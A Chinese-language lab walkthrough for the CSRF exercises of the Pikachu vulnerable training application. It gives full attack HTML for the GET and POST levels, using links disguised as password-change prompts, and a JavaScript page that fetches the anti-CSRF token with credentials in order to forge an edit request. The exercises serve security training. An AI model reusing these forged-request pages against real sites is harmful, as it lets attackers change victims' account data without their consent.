pikachu-csrf实例
get级别
这里需要同时修改性别、手机、住址、邮箱。
写一个简单的html文件,里面伪装修改密码的文字,代码如下:
<html>
<body>
<a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
pikachu-csrf-get
</a>
</body>
</html>
点击"pikachu-csrf-get"文字后,跳转到pikachu的csrf(get)界面,展示修改后的界面。
post级别
这里post请求,需要通过表单提交。
写一个简单的html文件,里面伪装修改密码的文字,代码如下:
<html>
<body>
<a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
pikachu-csrf-get
</a>
</br>
<form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
<input id="sex" type="text" name="sex" value="5" />
<input id="phonenum" type="text" name="phonenum" value="5" />
<input id="add" type="text" name="add" value="5" />
<input id="email" type="text" name="email" value="5" />
<input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
</form>
</body>
</html>
点击"pikachu-csrf-post"文字后,跳转到pikachu的csrf(post)界面,展示修改后的界面。
token级别
这里get请求+token。
写一个简单的html文件,里面get请求拼接token,代码如下:
<html>
<body>
<a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
pikachu-csrf-get
</a>
</br>
<form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
<input id="sex" type="text" name="sex" value="5" />
<input id="phonenum" type="text" name="phonenum" value="5" />
<input id="add" type="text" name="add" value="5" />
<input id="email" type="text" name="email" value="5" />
<input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
</form>
</br>
<a href="javascript:void(0);" onclick="initJS()">
pikachu-csrf-token
</a>
</body>
<script >
function initJS(){
var theUrl = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php';
if(window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
}else{
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange=function(){
if(xmlhttp.readyState ==4 && xmlhttp.status==200)
{
var text = xmlhttp.responseText;
// 创建一个临时的 div 元素,并将 HTML 字符串设置为其 innerHTML
var tempDiv = document.createElement('div');
tempDiv.innerHTML = text;
// 从临时 div 中查找具有 name 属性为 "token" 的输入元素
var tokenInput = tempDiv.querySelector('input[name="token"]');
var token = tokenInput.value;
console.log('Token Value:', token); // 在控制台输出 token 的值
console.log('count',count);
var new_url = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex=7&phonenum=7&add=7&email=7&token='+token+'&submit=submit';
console.log('newurl',new_url);
}
};
xmlhttp.open("GET",theUrl,false);
xmlhttp.send();
}
</script>
</html>
点击"pikachu-csrf-token"文字后,在控制台中查看newurl,并复制下来输入到浏览器中。
刷新csrf token,展示了修改后的信息。
破解成功